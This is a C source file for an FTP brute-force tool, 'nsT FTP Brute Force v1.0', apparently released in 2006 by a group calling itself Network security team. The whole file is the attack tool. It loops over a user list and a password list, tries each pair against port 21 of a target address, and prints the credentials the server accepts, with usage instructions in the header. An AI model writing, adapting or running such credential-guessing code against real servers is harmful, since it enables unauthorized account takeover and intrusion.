/*
oooo...oooo.oooooooo8.ooooooooooo
.8888o..88.888........88..888..88
.88.888o88..888oooooo.....888....
.88...8888.........888....888....
o88o....88.o88oooo888....o888o...
*********************************
**** Network security team ******
********* nst.void.ru ***********
*********************************
* Title: nsT FTP Brute Force v1.0
* Date: 09.04.2006
* Usage: ./bruteforce 127.0.0.1 users_list.txt passwords_list.txt
*********************************
*/
 
 
#include <stdio.h>
#include <error.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <resolv.h>
 
//#define DEBUG 1
 
#define PORT 21
 
int unsigned CheckAccount (char *host, char *login, char *passwd) {
    struct sockaddr_in dest;
    char response[256];
    int sd;
 
    if ((sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
            perror("Create Socket");
	    return 1;
    }
 
    dest.sin_family = AF_INET;
    dest.sin_port = htons(PORT);
    inet_aton(host, &dest.sin_addr);
 
    if (connect(sd, (struct sockaddr *)&dest, sizeof(dest)) != 0) {
	perror("Connect");
	return 1;
    }
 
    bzero(response, 256);
    read(sd, response, 255);
#if defined(DEBUG)
    printf("%s", response);
#endif
 
    bzero(response, 256);
    write(sd, "USER ", 5);
    write(sd, login, strlen(login));
    read(sd, response, 255);
 
#if defined(DEBUG)
    printf("%s", response);
#endif
 
    bzero(response, 256);
    write(sd, "PASS ", 5);
    write(sd, passwd, strlen(passwd));
    read(sd, response, 255);
 
#if defined(DEBUG)
    printf("%s\n", response);
#endif
 
    write(sd, "quit\r\n", 6);
    close(sd);
 
    if (!strncmp(response, "230", 3)) {
        return 0;
    }
 
    return 1;
}
 
 
int main (int argc, char **argv) {
    FILE *fdpwd, *fdlgn;
    char login[255], passwd[255];
 
    if (argc < 4) {
	printf("/-------------  FTP BrutForce  -------------------\\\n");
	printf(" [ Network Security Team ]\n"); 
	printf(" ./bruteforce <ipaddr> <users_list> <passwords_list> \n");
	printf("\\-------------   nst.void.ru   -------------/\n");
 
	return 1;
    }
 
 
    if (!(fdlgn = fopen(argv[2], "r")) || !(fdpwd = fopen(argv[3], "r"))) {
	perror(argv[0]);
	return 1;
    }
 
    while (fgets(login, 255, fdlgn)) {
        while (fgets(passwd, 255, fdpwd)) {
          if (!CheckAccount(argv[1], login, passwd))
            printf("login: %spasswd: %s\n", login, passwd);
        }
	fseek(fdpwd, 0, SEEK_SET);
    }
    fclose(fdpwd);
    fclose(fdlgn);
 
    return 0;
}